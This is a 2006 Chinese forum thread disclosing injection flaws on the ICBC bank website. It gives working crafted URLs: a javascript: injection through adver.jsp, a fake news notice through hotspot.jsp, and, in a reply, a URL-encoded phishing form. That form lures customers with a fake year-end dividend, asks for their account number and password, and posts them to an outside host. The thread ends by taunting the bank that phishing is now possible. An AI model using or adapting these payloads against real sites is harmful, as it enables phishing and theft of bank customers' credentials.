工行网站出现非常低级的漏洞，会导致用户被欺骗

工行虽然对hotspot的漏洞做了屏蔽，但是漏洞没有吗？

不，漏洞依然存在，虽然不在出现工行页面，但是由于使用的是工行的官方页面，所以只需要构造一个页面用来伪装工行页面，该页面仍然可以钓鱼，由于涉及银行用户安全，所以我不再公布具体的实施办法，只发布漏洞页面的范例，请大家测试(以下代码摘自http://www.phpobject.net/blog/index.php)

http://www.icbc.com.cn/click/adver/adver.jsp?para=javascript:test()";function%20test(){document.write('%B9%A4%D0%D0%BD%F4%BC%B1%CD%A8%D6%AA%A3%BA%B9%A4%D0%D0%D0%C2%CE%C5%CF%B5%CD%B3%B3%F6%CF%D6%D1%CF%D6%D8%C2%A9%B6%B4%A3%AC%D0%A1%D0%C4%B1%BB%C6%AD')}// 

工行网站出现非常低级的漏洞，会导致用户被欺骗

首先请确认工行官方网址：http://www.icbc.com.cn
输入以下连接地址
“http://www.icbc.com.cn/news/hotspot.jsp?column=工行紧急通知：工行新闻系统出现严重漏洞，小心被骗”
经过编码后的地址会让人觉得是一个真实的新闻
http://www.icbc.com.cn/news/hotspot.jsp?column=%B9%A4%D0%D0%BD%F4%BC%B1%CD%A8%D6%AA%A3%BA%B9%A4%D0%D0%D0%C2%CE%C5%CF%B5%CD%B3%B3%F6%CF%D6%D1%CF%D6%D8%C2%A9%B6%B4%A3%AC%D0%A1%D0%C4%B1%BB%C6%AD

虽然从文件名上来看像是最近流行的一个搞笑的东西，但是作为一个重要的金融机构的官方网站上出现这样东西是很危险的，所以这个漏洞非常低级，大家小心啊 

以下是截图

 

补充

firewing 构造的钓鱼代码，还可以在其中加如其他网站的代码，不过请大家谨慎，开始我们没有贴出代码的原因是怕担心带来损失，也请后面的程序员不要再贴出恶意欺骗和攻击性代码，以免给工行用户带来损失，非常感谢！！

  firewing 发表于2006-12-31 16:53:28  IP: 219.135.147.*

http://www.icbc.com.cn/news/hotspot.jsp?column=%3Cbr%2F%3E%3Cform+action%3D%27http%3A%2F%2Fcommunity.csdn.net%2FExpert%2Ftopic%2F5268%2F5268788.xml%3Ftemp%3D.5763819%27%3E%3Ch3%3E%D6%B5%B4%CB%D4%AA%B5%A9%BC%D1%BD%DA%D6%AE%BC%CA%A3%AC%D6%D0%B9%FA%B9%A4%C9%CC%D2%F8%D0%D0%C4%EA%D6%D5%B4%A2%BB%A7%B7%D6%BA%EC%BB%EE%B6%AF%D5%FD%CA%BD%BF%AA%CA%BC%C0%B2%A3%A1%3C%2Fh3%3E%3Cbr%2F%3E%C3%BF%CE%BB%B4%A2%BB%A7%BD%AB%B5%C3%B5%BD%D6%D0%B9%FA%B9%A4%C9%CC%D2%F8%D0%D0%B5%C4%C4%EA%D6%D5%B7%D6%BA%EC%CE%AA%BF%AA%BB%A7%CA%B1%BC%E4%A3%A8%D4%C2%A3%A9*100%A3%A8%D4%AA%A3%A9%A3%A1%3Cbr%2F%3E%3Cbr%2F%3E%C7%EB%CA%E4%C8%EB%C4%FA%D4%DA%B9%A4%C9%CC%D2%F8%D0%D0%B5%C4%B4%A2%D0%EE%D7%CA%C1%CF%A3%A1%3Cbr%2F%3E%B9%A4%D0%D0%D5%CA%BA%C5%A3%BA%3Cinput+type%3D%27text%27%3E%3Cbr%2F%3E%D5%CA%BB%A7%C3%DC%C2%EB%A3%BA%3Cinput+type%3D%27password%27%3E%3Cinput+type%3D%27submit%27+value%3D%27%C1%EC%C8%A1%B7%D6%BA%EC%27%3E%3C%2Fform%3E


这样就可以做钓鱼了。看你官方网站还怎么安全。
还官方网站呢。还安全没漏洞呢。